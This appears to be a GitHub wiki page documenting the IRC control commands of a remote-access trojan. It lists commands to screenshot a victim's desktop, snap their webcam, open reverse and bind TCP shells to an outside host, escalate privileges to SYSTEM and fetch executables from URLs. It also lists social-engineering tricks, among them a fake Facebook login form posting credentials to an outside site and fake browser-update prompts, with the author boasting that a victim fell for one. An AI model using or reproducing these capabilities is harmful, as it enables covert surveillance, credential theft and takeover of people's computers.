-
Notifications
You must be signed in to change notification settings - Fork 4
IRC Commands
AlMA PRO LEADER edited this page May 28, 2017
·
2 revisions
There are several commands on IRC that can be executed on both, private chat and channel chat.
But there are few commands that are only on private chat, and those are gs and rjc. Soon enough help command will be included.
The common commands are:
- ss: Set Settings. This will tell the bot to set the setting name in the first parameter to the value in the second parameter. [Ex: ss server http(s)://NewHost]
- mmo: Make Me Owner: Sometimes a bot comes to the channel before you do (in case channel is not registered), and it becomes the channel owner. This command tells the bot to make you owner. This command has no parameters.
- kuo: Kick User Out: Obviously kick someone out 0.0 This command takes one parameter, the user's nickname. [Ex: kuo BOTID] <== kicks itself if given the nick!
- cts: Connect To Server: This tells the bot to connect to the server. This one holds the IRC thread busy until connected or failed, which might take more than the maximum timeout of the server connected on, and bot gets disconnected. Don't worry it connects back automatically.
- unrar: A direct URL on which
unrarexecutable can be found. Take a URL as parameter. [Ex: unrar http(s)://somehost/unrar.exe] - unrar3: A direct URL on which
unrar3dll can be found. Take a URL as parameter. [Ex: unrar3 http(s)://somehost/unrar3.dll] - dss: Desktop Screen-Shot: This one needs no explanation nor parameters.
- wcs: Web-Cam Snap: Currently takes no parameters, but aiming on the TWO webcams devices.
- btcp: Bind TCP: A command to try and bind a
porton the victim's device. Takes only port as parameter to try it publicaly or (-l) as the first parameter and theportas the second to try it locally. [Ex: btcp 55]/[Ex: btcp -l 55] - rtcp: Reverse TCP: Takes one parameter HOST|PORT. Notice we use (|) mark not (:). [Ex: rtcp somehost|55]
- id: The user name and computer name that the bot is running on.
- ch: Check Higher: Check if the bot has ADMIN privileges.
- canh: Can Higher: Check if the bot can get higher.
- gh: Get Higher: Get higher than this level of privileges. Goes up to SYSTEM.
- sev: Social Engineer Vitim: Play some trick on the victim to make him/her do something foolishly =P It takes TWO parameters, the first is the trick number and the second is the content (in some tricks, content is not used).
This command comes withhome made tricks. And they're as follows:
- MSGBOX: Shows a message to the user. [Ex: sev 1 Hello ther ^^ How are you? Could you please give me your password? Thank you ^^]. I know you'll play it better than I do :|
- UpdateMSGBOX: A home made trick that shows a message saying windows needs updating
- ErrorMSGBox: A home made trick that shows a message saying
Unknown errorand opensGOOGLEsearch for that error! - BlueScreenOfDeath: This one needs no explanation but one thing to markdown, it needs ADMIN!
- FakeWebsitePage: This trick is a great one. Opens a web page in the default browser containing the parameter
contentin the format: TITLE|BODY. [Ex: sev 5You need to login first - Facebook|<form action="http://somewebsite/facebook-login.php" method="post"><input type="Text" name="user" placeholder="Username"><BR><input type="password" name="pass" placeholder="Password"><BR><input type="submit" value="Click here to login" name="submit"></form>]. Not short yeah? :| - FakeBrowserUpdate: This one is my favorite (AlMA PRO LEADER is speaking). This one checks for any running browser and shows a message to the user that the browser needs updating
Please allow any further operations.. I've seen someone falling for it :') And by the way it doesn't close the browser :| (How the hell did it trick him? :|)
Now those are very few, three to be specific:
- gs: Get Setting: This one tells the bot to fetch the setting name sent as the only parameter and send it to you. [Ex: gs server ==> response: Setting (server) is set to http(s)://host]
- rjc: ReJoin Channel: If the bot is kicked or some error happened and the bot never came back to the channel automatically, this command tells it to come back.
- help: This is easy to guess.
This nickname has more commands than the IRC bot does.
At the moment, none are present.